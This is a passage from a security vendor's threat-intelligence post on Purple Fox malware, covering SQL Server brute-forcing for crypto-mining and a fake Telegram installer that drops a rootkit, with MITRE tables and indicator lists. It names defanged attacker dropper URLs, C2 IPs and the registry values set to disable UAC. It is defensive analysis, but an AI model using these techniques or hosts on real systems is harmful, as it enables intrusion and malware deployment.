c2f8fea5752685fedbddc988dee00c60

Client_net_framework.exe

0f2439076b53afdff994446d6a3963e5

Client_net_framework.exe

98ff9fb7cd029d54c1a01506d16f75af

Client_net_framework.exe

Purple Fox backdoor components

MITRE Techniques

ID

Technique

Context

T1059.001 

Command and Scripting Interpreter: PowerShell

Purple Fox invokes powershell commands to download a malicious .msi file.

T1068

Exploitation for Privilege Escalation

Purple Fox uses several exploit modules to exploit various Powershell vulnerabilities and gain administrator privileges.

T1218.007

Signed Binary Proxy Execution: Msiexec

Msiexec.exe is used to execute a malicious .msi file which drops the main components of the malware.

T1112

Modify Registry

Purple Fox will check, remove and create registry keys to ensure persistence.

T1027.002

Obfuscated Files or Information: Software Packing

Purple Fox uses the VMProtect software to pack its rootkit.

T1014 

Rootkit

Purple Fox uses an open source rootkit to hide the files and registry entries it creates.

T1071.001

Application Layer Protocol: Web Protocols

Purple Fox initiates communication with its C2 servers via Websockets. 

 

SQL Server Crypto-mining (2021-12-13)

A follow-up article to their previous analysis was produced by Trend Micro on December 13th 2021, this time investigating the use of Purple Fox malware in targeting SQL Servers for cryptocurrency mining purposes. The article also details updated techniques employed by the newer versions of the malware (5. Trend Micro, December 2021).

As with previous versions of Purple Fox, the malware creates a suspended svchost.exe process and uses it to load and execute a payload in the form of a malicious DLL. The process in later versions however is renamed to fontdrvhost.exe by the rootkit driver.  As part of its Command and Control (C2) communication, Purple Fox is capable of retrieving additional encrypted DLLs via GET requests and loading them using the injected process. The malware has three distinct ways to communicate with its C2 servers. 

The first is Domain Name System (DNS). At the start of each process execution, the malware retrieves a list of C2 IP addresses using DNS. It is important to note that the IP addresses retrieved via DNS during this stage are not the real IP addresses used for the C2 servers but encoded versions of the real IP addresses. The encoded IPs can be decoded by subtracting a fixed number from the IP addresses.

The second communication method is the User Datagram Protocol (UDP), which the malware uses for various types of messages including building a cache of IP addresses that will be used for further communication. This is done by selecting an encoded IP address retrieved by DNS, decoding the IP address and attempting to pull an IP address cache from the selected address. If at any point this fails, the DNS will attempt to pull a new encoded IP address  and the process will begin again. 

The third communication method used by the malware is Hypertext Transfer Protocol (HTTP). HTTP is used to download additional malware files to the infected system. This is done in the form of a GET request in the following format, where [Filename].moe is a malicious DLL: 

hxxp://[IP Address]:[PORT]/[Filename].moe

These files are then saved and loaded by the injected process which decrypts, decompresses and executes them.  Several distinct malware files have been retrieved using the above process. The first is a SQL Server scanner. This file scans local and public IP addresses for SQL Servers running on port 1433. If it discovers the service running on this port it begins a brute-force attack on the SQL Server using a ten million-strong word list.

If the brute force attempt is successful, the malware executes an SQL script which installs a backdoor on the SQL Server. This backdoor allows for the execution of malicious Powershell commands via SQL statements.

The second malware file is a Monero (XMR) Coinminer. Once the file is executed it retrieves its configuration over UDP and executes an embedded XMRig binary in order to join a configured mining pool. It was noted by Trend Micro that the likely reason that SQL Servers have been targeted is due to their more powerful hardware configuration as opposed to regular desktop PCs, which makes coin mining more effective on these systems.

There are several methods of executing commands via SQL, in this case Purple Fox has opted to use CLR Assemblies. CLR Assemblies act as a group of DLLs which can be imported into SQL Servers used to expand the native functionality of SQL Servers; however, they can also facilitate the execution of malicious binaries via SQL (15. Netspi Blog, July 2017).

Indicators of Compromise

Type

Indicator

Relevance

Domain Names

Kew[.]8df[.]us

ret[.]6bc[.]Us

M[.]tet[.]kozow[.]com

a[.]keb[.]kozow[.]com

Domains used by the DNS requests to retrieve encoded IP addresses.

IP Address

178[.]195[.]162[.]94

79[.]222[.]214[.]20

145[.]68[.]65[.]106

73[.]127[.]195[.]228

53[.]238[.]137[.]143

Encoded IP addresses.

108[.]177[.]235[.]90:443

XMR Mining Pool IP Address

MITRE Techniques

ID

Technique

Context

T1059.001 

Command and Scripting Interpreter: PowerShell

Purple Fox invokes powershell commands to download a malicious .msi file.

T1068

Exploitation for Privilege Escalation

Purple Fox uses several exploit modules to exploit various Powershell vulnerabilities and gain administrator privileges.

T1218.007

Signed Binary Proxy Execution: Msiexec

Msiexec.exe is used to execute a malicious .msi file which drops the main components of the malware.

T1112

Modify Registry

Purple Fox will check, remove and create registry keys to ensure persistence.

T1027.002

Obfuscated Files or Information: Software Packing

Purple Fox uses the VMProtect software to pack its rootkit.

T1014 

Rootkit

Purple Fox uses an open source rootkit to hide the files and registry entries it creates.

T1071.001

Application Layer Protocol: Web Protocols

Purple Fox initiates communication with its C2 servers via Websockets. 

 

Dropping Purple Fox with fake Telegram Installer (2022-01-03)

On January 3rd 2022, Minerva reported Purple Fox rootkit distribution through a malicious Telegram messenger installer (11. Minerva Labs, 2022). The initial stage of the attack utilises an AutoIT compiled executable named Telegram Desktop.exe that has an icon that matches the Telegram logo in order to masquerade as a legitimate copy of the messaging software's installer. This fake installer creates a new directory, TextInputh, under C:\Users\Username\AppData\Local\Temp\ and within the folder drops two files: a legitimate Telegram installer and a malicious downloader named TextInputh.exe which is used for the next stage of the attack. 

TextInputh.exe is executed, creating a new directory under C:\Users\Public\Videos\ named 1640618495, and contacts a C2 server to retrieve two additional files: 1.rar and 7zz.exe. 1.rar is a malicious archive containing files used in the next stage of the attack while 7zz.exe is a legitimate 7-Zip archive tool used to extract the contents of 1.rar.  The 1.rar archive contains the following files: 

  • 360.tct - Malicious loader DLL 
  • rundll3222.exe - Legitimate Rundll executable
  • svchost.txt - File containing malicious payload in the form of byte code instructions for the loader
  • ojbk.exe - reflective loader 

360.tct, rundll3222.exe and svchost.txt are then copied by TextInput.exe to the ProgramData folder, renaming 360.tct to 360.dll in the process. Following this, ojbk.exe is run with the command line arguments ojbk.exe -a, the archive and the archive tool are deleted, and the process is exited. ojbk.exe is used to reflectively load the malicious 360.dll file with the "-a'' argument, this then reads the content of svchost.txt which contains byte code to execute the next stage of attack. 

First, a check is performed by the malware for the presence of 360 AV antivirus software. This is done by searching for the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe\Path.

If the key is found then the malware will drop the following five (5) additional files: Calldriver.exe, Driver.sys, dll.dll, kill.bat, speedmem2.hg.

A detailed analysis of these files was not provided by Minerva, but they are collectively utilised to shut down and disable the initiation of 360 AV and disable Windows User Account Control (UAC) by modifying the following registry keys, setting their values to zero (0):

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop

The malware then retrieves the following information from the infected system:

  • Hostname
  • CPU
  • Memory status
  • Drive Type 
  • Processor Type

The malware also checks for active antivirus solutions by searching for a number of antivirus related processes active on the system. All the information gathered is then sent to a hardcoded C2 address.  The final stage of the attack consists of the download and deployment of the Purple Fox rootkit described in previous sections.

Indicators of Compromise

Type

Indicator

Relevance

MD5 Hashes /

File Names

Telegram Desktop.exe

ed1b74827b64fc8913af19b1b745ad1a

Malware dropper masquerading as a Telegram installer. 

TextInputh.exe 

c398b504f74500d6a1a47f72bb45bc83

Second stage dropper. 

WindowsTelegram.exe

db1a5b22347216cdeeaeaaea03024a6e

Legitimate Telegram installer bundled with the malware. 

1.rar 

b947575d0cd7e171bdd38b89b38084da

Archive containing malware components. 

7zz.exe 

f2ae502d448cfb81a5f40a9368d99b1a

Legitimate 7-Zip used to extract the 1.rar file. 

360.tct/360.dll

96187e12ed4a6f4306516b48634c0926

Malware loader

ojbk.exe

50d39beb37c8bec70015a8fd1414b867

Executable used to reflectively load the malicious 360.dll file

rundll3222.exe

c36bb659f08f046b139c8d1b980bf1ac

Legitimate rundll executable bundled in the 1.rar file.  

svchost.txt

0937955fd23589b0e2124afeec54e916

File containing bytecode instructions for executing payload.

Calldriver.exe

963a8b3d307992b6e623ff39e34e6a4c

Malicious files used to shut down and disable 360 AV and disable UAC.

Driver.sys

7c074b14a54f7b3846e51cfca778f66f

 

Dll.dll 

7c728bdeba5659be53cf9ef243b1902e

 

kill.bat

24bcbb228662b91c6a7bbbcb7d959e56

 

speedmem2.hg

599dbafa6abfaf0d51e15aeb79e93336

 

Path

C:\Users\Username\AppData\Local\Temp\TextInputh

Directory for files dropped by the malicious Telegram installer. 

C:\Users\Public\Videos\1640618495

Directory for files dropped by second stage dropper TextInputh.exe 

Registry Path/Key

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin

The values of these keys are set to zero (0) by the malware in order to disable UAC

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 

 

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop

 

IP Addresses

144.48.243[.]79 [Hong Kong]

Last stage C&C server

193.164.223[.]77 [Hong Kong]

Second stage C&C server

Urls 

hxxp://193.164.223[.]77:7456/h?=1640618495

Dropper URL for 1.rar file 

hxxp://193.164.223[.]77:7456/77

Dropper URL for 7zz.exe file 

hxxp://144.48.243[.]79:17674/C558B828.Png

Dropper URL for Purple Fox Rootkit

MITRE Techniques

ID

Technique

Context

T1592

Gather Victim Host Information

Malware gathers system information.

T1036

Masquerading

Malware Masquerading as Telegram Messenger installer. 

T1112

Modify Registry

Disable UAC by setting registry value to 0

T1620

Reflective Code Loading

Malware reflectively loads a malicious dll file. 

T1014

Rootkit

Malware drops and installs Purple Fox rootkit. 

T1041

Exfiltration Over C2 Channel

Exfiltrates device information over C2 channel. 

T1489

Service Stop

Malware shuts down and blocks the initiation of AV processes and service. 

References/Sources

  1. (2018-09-25) 360 Total Security blog: Purple Fox Trojan burst out globally and infected more than 30,000 users [Accessed 2022-01-06]
    hxxps://blog.360totalsecurity[.]com/en/purple-fox-trojan-burst-out-globally-and-infected-more-than-30000-users/
  1. (2019-09-09) Trend Micro: ‘Purple Fox’ Malware Can Rootkit and Abuse PowerShell [Accessed 2022-01-06]  hxxps://www.trendmicro[.]com/en_us/research/19/i/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell.html
  1. (2019-08-22) GitHub: Jora Kornev: hidden [Accessed 2022-01-06]
    hxxps://github[.]com/JKornev/hidden
  1. (2020-07-05) Proofpoint: Purple Fox EK Adds Exploits for CVE-2020-0674 and CVE-2019-1458 to its Arsenal [Accessed 2022-01-06]
    hxxps://www.proofpoint[.]com/us/blog/threat-insight/purple-fox-ek-adds-exploits-cve-2020-0674-and-cve-2019-1458-its-arsenal

  2. (2021-12-13) Trend Micro: A Look Into Purple Fox’s Server Infrastructure [Accessed 2022-01-06] hxxps://www.trendmicro[.]com/en_us/research/21/l/a-look-into-purple-fox-server-infrastructure.html
  1. (2021-03) Guardicore Labs: Purple Fox Rootkit Now Propagates as a Worm [Accessed 2022-01-06] hxxps://www.guardicore[.]com/labs/purple-fox-rootkit-now-propagates-as-a-worm/

  2. (2021-04-14) HP Wolf Security Blog: From PoC to Exploit Kit: Purple Fox now exploits CVE-2021-26411 [Accessed 2022-01-06]
    hxxps://threatresearch.ext.hp[.]com/purple-fox-exploit-kit-now-exploits-cve-2021-26411/

  3. (2021-04-02) Enki Blog: Internet Explorer Zero Day [Accessed 2022-02-08]
    hxxps://enki.co.kr/blog/2021/02/04/ie_0day.html

  4. (2021-07-01) Trend Micro: PurpleFox Using WPAD to Target Indonesian Users [Accessed 2022-01-06] hxxps://www.trendmicro[.]com/en_us/research/21/g/purplefox-using-wpad-to-targent-indonesian-users.html
  1. (2021-07-25) 360 Total Security has supported the defense against PrintNightmare vulnerabilities [Accessed 2022-01-06]
    hxxps://blog.360totalsecurity[.]com/en/360-total-security-has-supported-the-defense-against-printnightmare-vulnerabilities/
  1. (2022-01-03) Minerva Labs: Malicious Telegram Installer Drops Purple Fox Rootkit [Accessed 2022-01-06] hxxps://blog.minerva-labs[.]com/malicious-telegram-installer-drops-purple-fox-rootkit
  1. (2016-05-25) Sophos Naked Security: When domain names attack: the WPAD name collision vulnerability [Accessed 2022-01-27]
    hxxps://nakedsecurity.sophos[.]com/2016/05/25/when-domain-names-attack-the-wpad-name-collision-vulnerability/
  1. (2020-10-19) SentinelOne: Purple Fox EK | New CVEs, Steganography, and Virtualization Added to Attack Flow [Accessed 2022-01-06]
    hxxps://www.sentinelone[.]com/labs/purple-fox-ek-new-cves-steganography-and-virtualization-added-to-attack-flow/

  2. (2021-10-19) Trend Micro: PurpleFox Adds New Backdoor That Uses WebSockets [Accessed 2022-02-08]
    hxxps://www.trendmicro[.]com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html

  3. (2017-07-13) Netspi: Attacking SQL Server CLR Assemblies [Accessed 2022-02-09]
    hxxps://www.netspi.com/blog/technical/adversary-simulation/attacking-sql-server-clr-assemblies

 

Our findings led us to investigate an updated PurpleFox arsenal. Foregenix provide deep knowledge and experience, highly technical analysis and expert threat monitoring and correlation to have one single source of detection and response.

We have developed in-house solutions to detect and mitigate active, advanced and previously unknown threats. Contact us for more support.

CONTACT US

 

Contact Us

Access cybersecurity advisory services

 

profile-default-m
Ben Helps, Murray Crossan and Calum Stewart

Research developed by Foregenix Digital Forensics and Incidents response team members.

See All Articles
SUBSCRIBE

Subscribe to our blog

Security never stops. Get the most up-to-date information by subscribing to the Foregenix blog.